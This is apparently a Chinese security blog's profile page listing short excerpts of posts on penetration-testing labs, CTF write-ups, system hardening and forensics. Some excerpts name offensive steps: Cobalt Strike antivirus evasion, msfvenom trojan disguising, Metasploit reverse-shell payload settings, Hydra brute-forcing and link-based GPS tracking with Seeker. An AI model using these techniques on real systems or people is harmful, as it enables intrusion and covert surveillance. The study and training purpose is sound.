自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(41)
  • 收藏
  • 关注

原创 CobaltStrike使用插件实现免杀

免责声明:本工具仅供安全研究和教学目的使用,用户须自行承担因使用该工具而引起的一切法律及相关责任。作者概不对任何法律责任承担责任,且保留随时中止、修改或终止本工具的权利。使用者应当遵循当地法律法规,并理解并同意本声明的所有内容。找小的 ico 图标,比如 5kb、10kb 的。Cobalt Stirke 插件,依赖 nim。导入免杀插件,点击Script Manager。启动cs,点击Connect。可以直接生成免杀shell。

2024-04-24 16:18:21 607 2

原创 linux系统安全配置命令详解

iptables -t 表名 <-A/I/D/R> 规则链名 [规则号] <-i/o 网卡名> -p 协议名 <-s 源IP/源子网> --sport 源端口 <-d 目标IP/目标子网> --dport 目标端口 -j 动作。cp /etc/sysconfig/iptables.bak /etc/sysconfig/iptables(恢复)(输入y回车)cp /etc/sysconfig/iptables /etc/sysconfig/iptables.bak(备份)

2024-04-24 10:10:59 400 4

原创 kali数字签名出错解决方法

kali-rolling InRelease下列签名无效: EXPKEYSIG ED444FF07D8D0BF6 Kali Linux Repository 获取 :2。kali-rolling InRelease下列签名无效: EXPKEYSIG ED444FF07D8D0BF6 Kali Linux Repository kali-rolling InRelease [41.2 kB]错误:1。安装签名即可解决问题。

2024-04-24 10:05:28 268

原创 sql注入漏洞语句原型及闭合方法

注意,想成功利用 insert 注入有个必要的前提,就是你一定要知道自己插入的数据在前端的什么地方显示。对于大多数普通的 cms 而言,前端用户的大多数操作可能都是在点击链接,然后把对应的参数值传给后端脚本,然后脚本再到数据库中去查,之后再把查询的结果返回给前端页面显示给用户。相对于 insert 可能会比较麻烦的一点的是,update 一般都是在 set 一个新值,这也就意味着我们在闭合的时候,在前端很可能是没有任何回显的,这样的话我们在实际查询数据的时候可能就要费点儿劲了。

2024-04-24 10:03:35 527

原创 Metasploit漏洞利用模块及命令

msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp(反弹载荷)msf > use exploit/windows/browser/ms10_018_ie_behaviors(使用ms10_018_ie_behaviors模块)msf > use exploit/windows/browser/ms10_002_aurora (使用ms10_002_aurora模块)

2024-04-24 09:52:23 504

原创 Msfvenom生成木马实验

编码处理型:msfvenom -p <payload> <payload options> -a <arch> --platform <platform> -e <encoder option> -i <encoder times> -b <bad-chars> -n <nopsled> -f <format> -o <path>/root/Desktop /putty.exe -k -f exe -o /tmp/putty_evil.exe生成伪装木马,将payload。

2024-04-24 09:45:11 1180 3

原创 SQL注入漏洞代码分析

按照所传递的数据类型分类: 数字型注入 SELECT first_name, last_name FROM users WHERE user_id= id字符型注入SELECTfirstn​ame,lastn​ameFROMusersWHEREuseri​d=′id‘ 无论何种类型,都可以通过直接输入单引号来判断是否存在注入点。对于字符型注入,对用于接收用户参数的变量,用mysql_real_escape_string()、addslashes()等函数进行过滤。代码层面 1.对输入进行严格的转义和过滤;

2024-04-23 15:46:09 960 1

原创 FireKylin工具使用攻略应急响应工具(系统痕迹采集)

FireKylin中文名称叫:火麒麟,其实跟某氪金游戏火麒麟并没有关系,作为国产的网络安全工具名称取自中国神兽:麒麟。FireKylin的使用方式很简单,将Agent程序上传到需要检测的主机上,运行Agent程序,将采集到的数据.fkld文件下载下来,用界面程序加载数据就可以查看主机中的用户、进程、服务等信息,并且Agent最大的特点就是【0命令采集】对安装了监控功能的安全软件的主机来讲是非常友好的,不会对监控软件产生引起“误报安全事件”的命令。点击左上角的操作加载数据,将我们刚才采集的数据导入进去。

2024-04-23 15:36:27 420

原创 Centos系统安全加固

简介:centos 系统加固。Redhat是目前企业中用的最多的一类Linux,而目前针对Redhat攻击的黑客也越来越多了。我们要如何为这类服务器做好安全加固工作呢?一.账户安全1锁定系统中多余的自建帐号检查方法:执行命令查看账户、口令文件,与系统管理员确认不必要的账号。对于一些保留的系统伪帐户如:bin, sys,adm,uucp,lp, nuucp,hpdb, www, daemon等可根据需要锁定登陆。备份方法:加固方法:使用命令passwd -l 锁定不必要的账号。

2024-04-23 15:30:43 917

原创 Ghidra 软件逆向工具

Ghidra框架,该框架包括一套 功能齐全的高端软件分析工具,使用户能够分析编译后的代码。吉德拉 支持多种处理器指令集和可执行格式,并且可以在两者中运行 用户交互和自动化模式。用户还可以开发自己的 Ghidra 扩展组件 和/或使用 Java 或 Python 的脚本。Ghidra和IDA比起来最大的区别就是IDA是收费的而Ghidra是完全免费的。该工具使用的同时需要新建工程,然后在导入需要逆向的二进制文件。该工具需要Java环境的支持,请自行配置后使用。需要分析的二进制文件的基本信息基本也就出来了。

2024-04-23 15:19:43 919 1

原创 帕鲁杯-MISC Writeup

curl一个链接这边我们看到了假flag,接着看 进一步看发现只有在cronjos/recodes/log。PowerBy: 后面的似乎是某种加密 由于不知道什么编码所以用工具一把梭 我们使用 ciphey工具。之后返回200,我们先分析一下返回是什么看链接名cronjobs似乎是什么东西的定时任务。curl不通的会显示,那我们直接看没有 Could not resolve的。包返回任务执行结果直接过滤,这里有一个规律在返回的。stun为 nat打洞的,目前可以直接看的只有。

2024-04-23 10:38:24 814

原创 第一届帕鲁杯应急响应题目

题目要求:提交攻击者留在Web服务器上的恶意程序的32位小写md5值。题目要求:请提交运维服务器上的恶意文件md5(小写32位md5值)。题目要求:提交攻击者在监控服务器上留下的dcnlog地址。提交格式: [2024/00/00/00:00:00]题目要求:请提交该计算机中记录的重要联系人的家庭住址。提交格式:[2024/00/00/00:00:00]提交格式:[2024/00/00/00:00:00]题目要求:提交监控服务器上恶意用户的上一次登录时间。题目要求:提交攻击者反弹shell使用的语言。

2024-04-22 15:29:56 1462

原创 第一届帕鲁杯应急响应模块说明

这趟旅程的目的是遍访我们的信息系统每一个角落,探寻隐藏在暗处的风险海怪,提升船员们对数据宝藏的守护意识,确保我们的珍贵资讯宝藏不被外界窥见,不受损害,随时准备发挥其价值。你和你的团队,作为这次探险的领航员,将借助先进的应急响应罗盘,对我们的内部信息航道进行全域的安全梳理。从网络的海洋到系统的天空,从数据库的深渊到应用的岛屿,无一处不在你们的巡航范围之 内。向着更安全的港湾,全速前进。3.在打开的“导入虚拟机”中输入正确的主机名,选择空间充足的存储路径,点击 “导入”完成导入 操作。

2024-04-22 14:39:00 1800

原创 XiebroC2 渗透测试图形化框架

本项目仅用于渗透测试演练的学习交流和研究,强烈不建议您用于任何的实际途径(包括黑灰产交易、非法渗透攻击、割韭菜),网络不是法外之地!这款工具支持多人协作的渗透测试图形化框架、支持lua插件扩展、域前置/CDN上线、自定义多个模块、自定义shellcode、文件管理、进程管理、内存加载等功能。打开profile.json修改文件配置,将ip改为自己的kali ip即可。运行该文件后会自动生成profile.json。将exe发送给小鱼,坐等小鱼上线就好啦。配置完成后即可开启服务端。利用客户端来进行连接。

2024-04-22 14:29:40 1030

原创 [SWPUCTF 2021 新生赛]easy_md5

从代码可以看出,需要我们get传入name,post传入password,而且两个的值都不能相同,但md5后的散列值要相同。md5加密过后以0e开头且后面皆为纯数字。所以我们直接使用md5为0e开头的值即可。传入后即可得到flag。

2023-12-08 11:38:51 283

原创 [SWPUCTF 2021 新生赛]jicao

代码里没有显示有过滤规则,需要post传id和GET请求json,GET会进行数据的回应进行解码。直接进行传参:get:json={"x" : "wllm"}靶场开启后,只给了一段php代码。

2023-12-07 17:59:57 117

原创 2024年山东省职业院校技能大赛中职组“网络安全”赛项竞赛试题

5.操作系统提供的服务可能包含了远程代码执行的漏洞,要求用户找到远程代码执行的服务,并利用此漏洞获取系统权限;5.操作系统提供的服务可能包含了远程代码执行的漏洞,要求用户找到远程代码执行的服务,并利用此漏洞获取系统权限;2.靶机服务器上的网站可能存在命令注入的漏洞,要求选手找到命令注入的相关漏洞,利用此漏洞获取一定权限;2.堡垒服务器上的网站可能存在命令注入的漏洞,要求选手找到命令注入的相关漏洞,利用此漏洞获取一定权限;请根据《赛场参数表》提供的信息,在客户端使用谷歌浏览器登录需要加固的堡垒服务器。

2023-11-26 09:58:52 321

原创 CTF内存取证(window)

此外,您的任务是识别和缓解攻击者留下的任何痕迹或足迹。凭此进程的话是没有办法去判断哪个是可疑的,然后我们使用其他的插件去排除一下,以下命令为扫描恶意代码。查看到了这个Outline.exe进程,我去网上查了些资料确定了这个就是vpn的进程。跑出了这个ip地址后,我判断了一下,这个就是攻击者的ip地址。7.查看攻击者访问的PHP文件的完整URL是什么?3.请查看应用于可疑进程内存区域的内存保护是什么?2.查看一下可疑进程的子进程名称是什么?4.负责VPN连接的进程的名称是什么?1.目标可疑进程的名称是什么?

2023-11-11 20:25:02 370

原创 wireshark数据包分析与取证web—流量分析

1.使用Wireshark查看并分析虚拟机windows10桌面下的web.pcap数据包,然后根据所得信息进行确定服务器上发起这些请求的源 IP 地址作为flag提交。提交格式flag{xxxxxxxxx}3.攻击者在我们的服务器上发现开放端口后,似乎试图枚举我们 Web 服务器上的目录和文件。4.在攻击者枚举 Web 服务器上的目录之后,攻击者发出了大量请求,试图识别管理界面。提交格式flag{xxxxxxxxx}其实题目的意思就是去查看登录的指纹 flag{manager}

2023-11-10 18:03:25 925

原创 代码审计之漏洞描述

SQL注入攻击:代码中的SQL查询拼接使用了未经过滤或转义的username参数,使得攻击者可以通过构造恶意输入来执行任意的SQL语句。黑客利用上述过程,将精心构造的请求放到传入的变量参数中,让服务器端执行恶意代码,从而达到了读取数据库中敏感信息的效果,甚至将数据库删除。通过 工具或人工审查的方式,对程序源代码 逐条进行检查和分析,发现源码缺陷引发的安全漏洞,并且需要提供代码修订措施和修复建议。1.请指出存在漏洞的代码的行号 (5分)1.请指出存在漏洞的代码的行号 (5分)2.并描述可能造成的影响;

2023-11-05 20:19:27 90

原创 SQL注入实验靶场(附环境)

​ 扫出了一个库,证明信息就在这个库里面,得知信息在此库里面就好办了,直接爆表和字段信息sqlmap -u http://192.168.171.131/cat.php?​ 是一个登录页面,我们不知道密码,那我们就通过数据库来进行获取信息,在前面的源码中发现存在id参数注入,测试一下该靶场是否存在sql注入。页面没有什么可用的资源,查看源码,从源码可以发现是存在id参数注入,文件上传。进入到上传目录,发现了这个页面存在图片和信息类的,还有相关的路径。通过路径还可以发现有admin目录的,直接访问一手。

2023-11-05 17:07:35 630

原创 HUAWEI—ensp和vm16进行模拟仿真对交换机进行泛洪攻击

这里将server设置成为web服务器,配置相关的网站访问服务,先给服务器配上ip,跟Cloud同网段即可:192.168.178.10,其他的配置如何下图。8.备份和紧急响应计划:确保备份交换机配置,并制定灵活的紧急响应计划,以便在出现泛红攻击或其他网络安全事件时能够快速响应和恢复。描述:泛红攻击(Flood Red)是一种对交换机进行的DoS(拒绝服务)攻击,旨在耗尽交换机的处理能力和网络带宽。所有配置的工作都已完成,接下来进行攻击实验,启动kali,利用macof进行泛红攻击。

2023-11-05 15:49:57 576

原创 带你玩转渗透测试靶机Vulnhub-CengBox3

结果出来了,非常帅呀,今天的主角开了蛮多端口的嘛80,443端口皆是HTTP服务的,所在443端口的Apache2.4.18 为SSL,ceng-company.vm这个是域名,还有我们最熟悉的22端口,但是这个没开启ssh服务呀!使用kali自带的wireshark分析该数据包,由于我的wireshark出现故障了,没有办法给大家演示,你们可以在自己的kali里去复述,我之前做的时候就已经找过密码了,我在这里直接展示出来给大家。我们在url的后面上是有一个cmd的,我们将反弹语句在cmd上执行。

2023-11-02 19:57:59 195 1

原创 wireshark数据包分析与取证10549-nfs流量分析

1.使用wireshark查看并分析window10桌面下的nsf.pcapng数据包文件,通过分析数据包nsf.pcapng找出小白在局域网分享的一个文件,小黑花了不到几秒钟就找到了。在tcp流里发现了一个典型的base64为加密的一串信息,直接丢去解密一下。提交格式:flag{xxxxxxxxxxxxxxxxxXXX}筛选条件:tcp.stream eq 1。好了,成功解出了flag!发现可疑的key.txt文件。追踪一下该流量的tcp流。

2023-10-29 08:07:16 224 1

原创 2022年全国职业院校技能大赛网络安全(中职组)A模块评分标准

找到文件(system32,hosts,Program Files, Perflogs) 点击属性—>安全 —->高级—>所有者—>编辑—>其他用户和组—>点击高级—>立即查找—>选择 Administrator (最高用户组)–>一路回车进行更新权限即可。高级安全 Windows 防火墙–>新建规则–>规则类型 设置端口–>协议 和端口设置 tcp 和 445 或者 23–>操作设置阻止连接–>配置文件设置所有–> 名称 445 和 23 端口。c.设置 root 用户的计划任务。

2023-10-28 18:08:24 1001 1

转载 2022年全国职业院校技能大赛网络安全(中职组)D模块评分标准

在下图漏洞加固正确的前提下若有漏洞发现的过程或思路则给分。在下图漏洞加固正确的前提下若有漏洞发现的过程或思路则给分。在上图漏洞加固正确的前提下若有漏洞加固的过程或思路则给分。在下图漏洞加固正确的前提下若有漏洞发现的过程或思路则给分。在上图漏洞加固正确的前提下若有漏洞加固的过程或思路则给分。在下图漏洞加固正确的前提下若有漏洞发现的过程或思路则给分。以下两张图片只要选手的截图中任意一张图与之相符即可给分。以下两张图片只要选手的截图中任意一张图与之相符即可给分。得分点三:root 用户通过 SSH 远程登录。

2023-10-28 15:25:00 227 1

原创 网络端口号大全(附服务说明)

这将会停止缓慢的连接。入侵者的帐户被关闭,他们需要连接到高带宽的E-MAIL服务器上,将简单的信息传递到不同的地址。说明:它是动态端口的开始,许多程序并不在乎用哪个端口连接网络,它们请求系统为它们分配下一个闲置端口。大多数对这个端口的扫描是基于UDP的,但是基于TCP的mountd有所增加(mountd同时运行于两个端口)。记住:一种LINUX蠕虫(admv0rm)会通过这个端口繁殖,因此许多这个端口的扫描来自不知情的已经被感染的用户。说明:有时会看到很多这个端口的扫描,这依赖于用户所在的位置。

2023-10-24 20:19:57 773

原创 带你玩转渗透测试靶场Vulnhub——Gaara:1

跑出了这个Cryoserver,老规矩访问一下喽,页面访问打开的瞬间是空白,后来琢磨了一下,发现页面是可以滑动的,直接滑到最下面是有三个后缀名的,直接联想到有可以访问了哈哈哈,一个一个的去访问,访问发现第一个和第二个后缀访问出来的是一堆英文翻译过来也是一些没啥有用的信息。根据这个解码的提示,/usr/local/games目录下是有提示的的,直接切换至其目录下查看,切换到目录下发现了一文件,打开之后发现这是一个典型的brainfuck加密,解密之后没啥信息。扫出来是,一共是开放了两个端口的。

2023-10-22 17:42:50 648 1

原创 通过一条链接就可以获取GPS信息,你知道是怎么实现的吗?

Seeker工具是一款可以获取高精度地理和设备信息的工具,Seeker工具是通过HTML5,Javascript,JQuery和PHP来抓取设备信息,以及实现对设备的高精度的地理位置的获取。维护网络安全,就是守护我们共享的数字空间,保护个人隐私和信息安全,为打造一个更加信任和健康的网络环境贡献自己的力量。到这所有的配置已经完成了,它的服务会自动启动,我们现在就只需要输入kali的IP+8080端口即可。注:本文在此说明所用到的技术手段,是为了人们更好的防御,坚决反对一切危害网络安全的行为。

2023-10-22 11:54:27 1926 1

原创 九头蛇(hydra)密码爆破工具

#$%^&()-= -t 8 192.168.1.1 http-get / -l admin 为尝试破解的用户名。# -x 6:10:1a. 表示枚举的密码由 数字、小写字母和单字符’.'等等组成,长度为 6 - 10 位。hydra ip地址 telnet -l 用户字典.txt -P 密码字典.txt -t 32 -s 23 -e ns -f -V。因为字典数量比较少,我们可以轻易的破解成功,但是实际情况下,我们可能需要很久。HYDRA是著名组织THC的一款开源的暴力破解密码工具,其功能非常强大的。

2023-10-15 19:05:09 337 1

原创 带你玩转渗透测试靶场Vulnhub——sunset: nightfall

这样的话,我们利用这两个用户名(nightfall,matt)去爆破一下ftp服务(九头蛇密码爆破工具)命令如下:我这里是引用了kali自带的一个密码本去破解的,当然你们也可以去生成新的这些都是可以的。既然是这个matt的home目录中,那我们直接上传SSH的公钥到authorized_keys文件,然后用私钥去进入靶机,然后在提权, 以下:先生成一个ssh的密钥。这时我们回想起刚才的端口服务那的samba的服务,针对samba我们用以下的命令去解决它。已经成功利用ftp服务,进到了靶机内部。

2023-10-14 22:17:50 217 1

原创 全国职业院校技能大赛网络安全赛项B模块(超详细解析)

一.拓补图。

2023-09-03 17:59:03 2495

原创 wireshark数据包分析与取证attack.pcapng

7.继续查看数据包文件attack.pacapng提取出黑客下载的文件,并将文件里面的内容为FLAG(形式:【文件内容】)提交: FLAG:【Manners maketh man】直接筛选黑客IP:ip.addr == 172.16.1.102 FLAG: 21 80 3389 445 5007。方法:使用binnwalk -e attack.pcapng 再将kali数据包中的flag文件分离出来就ok啦!

2023-08-31 10:27:59 1051

原创 10个优秀的日志分析工具

3、Papertrail:是Windows的日志分析器,可自动扫描日志数据,还可以选择希望扫描结果显示的信息,能够更快地找到安全事件的原因,可以按时间,来源或选择的自定义字段筛选日志事件,消除最重要的不相关数据。可以按源,数据,严重性级别,工具或消息内容过滤事件。10、LogDNA:可以实时监控日志数据,在云的基础上,可以在不到两分钟的时间内配置为从AWS,Heroku,Elastic,Docker和其他供应商收集日志,并立即使用带宽聚合来自网络中应用程序和服务器的日志,以处理每秒一百万个日志事件。

2023-07-13 14:26:20 2465 1

原创 wireshark命令行工具tshark

wireshark是我们最常用的抓包和分析数据的工具。但是在Linux服务器中,没有安装图形化界面,想用wireshark抓包就比较困难,本文为大家介绍wireshark的命令抓包工具Tskark。本期的抓包工具wireshark的功能就分享到这里啦!利用-w将抓取到的数据包保存为文件,借助wireshark进行分析。加上 -V 之后会显示信息的数据包信息,效果如下图。可以用tshark -h测试是否安装成功。抓取通过eth0网卡的实时数据包。抓取来自10.1.1.1的数据流。利用-r读取保存的抓包文件。

2023-07-11 15:28:27 1067

原创 权限提升漏洞(CVE-2023-2478)

在复制过程中,会发生uid映射错误,攻击者可实现在目标系统上提升至ROOT权限。GitLab CE/EE多个受影响的版本中,某些情况下实例上经过身份证验证的任何GitLab用户都可以利用该漏洞,使用GraphQL端点将恶意运行程序附加到实例上的任意项目,成功利用可能导致敏感信息泄露或代码执行等。启明星辰VSRC检测到GitLab官方发布更新公告,修复了GitLab社区版(CE)和企业版(EE)中的一个代码执行漏洞(CVE-2023-2478)该漏洞的CVSSv3评分为9.6。

2023-05-12 11:09:39 1077

原创 vulnhub靶机之渗透服务版本

以上看到21端口的ftp服务的版本号是ProFTPD 1.3.3c 这个服务版本的话是具有漏洞的,我们使用msf这个工具进行渗透一波。使用nmap工具去查看靶机开放的端口即服务版本 nmap -A -sV -p- 192.168.1.109。3.4 设置目标靶机的IP地址:set rhosts 192.168.1.109。跑完之后已经是ROOT的权限了,本次靶机的渗透也就到此结束啦!我们还需要设置一个本地的监听地址(kali攻击机的IP)将网卡设置成为桥接模式,攻击机靶机在同一个网段即可。

2023-05-05 16:51:40 323

原创 带你玩转渗透测试靶场Vulnhub——Android4

安卓(Android)是一种基于Linux内核(不包含GNU组件)的自由及开放源代码的操作系统。主要使用于移动设备,如智能手机和平板电脑,由美国Google公司和开放手机联盟领导及开发。Android操作系统最初由安迪·鲁宾开发,主要支持手机。2005年8月由Google收购注资。2007年11月,Google与84家硬件制造商、软件开发商及电信营运商组建开放手机联盟共同研发改良Android系统。随后Google以Apache开源许可证的授权方式,发布了Android的源代码。第一部Android智能手机

2023-05-05 10:30:40 885 2

原创 带你玩转渗透测试靶场Vulnhub——BIZARRE ADVENTURE: STICKY FINGERS

1.环境搭建:攻击机KALI IP地址:192.168.1.101靶机IP地址:192.168.1.108注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段即可)二.实战1.netdiscover (扫描整个局域网)2.使用nmap工具去查看靶机开放的端口即服务开放了22/53/80端口,直接访问80端口80端口没有可用的东西,目录扫一下访问一下刚才扫描到的/images/ 大多数都不可用的东西访问Flag.txt.txt,发现也是没有可用的东西。

2023-04-25 20:23:59 179

原创 带你玩转渗透测试靶场Vulnhub——hacksudo3

从目录里面发现/hidden/ 我们先去访问一下http://192.168.1.108/hidden,由此发现好像是一个解密的。我们先来访问默认的登录页面:http://192.168.1.108/login.php 竟然发现了这个网页的登录页面。继续访问下一个,http://192.168.1.108/decrypt/ 发现这个也是一个解密的网站。访问:http://192.168.1.108/bruteforce/这也是一个解密用的网站。以上的命令都可以执行的话,证明是存在命令注入漏洞的。

2023-04-24 15:30:52 635 2

2023年信息安全管理与评估赛项任务书(模块三).docx

2023年信息安全管理与评估任务书——ABC三模块

2023-11-05

2023年信息安全管理与评估赛项任务书(模块一).docx

2023年信息安全管理与评估任务书——ABC三模块

2023-11-05

2023年信息安全管理与评估赛项任务书(模块二).docx

2023年信息安全管理与评估任务书——ABC三模块

2023-11-05

2023年甘肃省职业技能大赛“网络安全”赛项(教师组)样题(二).pdf

2023 年甘肃省职业院校技能大赛(中职教师组)网络安全竞赛试题

2023-11-05

2023年甘肃省职业技能大赛“网络安全”赛项(教师组)样题(五).pdf

2023 年甘肃省职业院校技能大赛(中职教师组)网络安全竞赛试题

2023-11-05

2022全国职业院校技能大赛-网络安全竞赛试题1.docx

2022全国职业院校技能大赛-网络安全竞赛试题1

2023-10-25

广东省第三届职业技能大赛(世界技能大赛选拔赛)网络安全赛项C模块赛题

广东省第三届职业技能大赛(世界技能大赛选拔赛)网络安全赛项C模块赛题

2023-09-22

广东省第三届职业技能大赛(世界技能大赛选拔赛)网络安全赛项A模块赛题

广东省第三届职业技能大赛(世界技能大赛选拔赛)网络安全赛项A模块赛题

2023-09-22

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除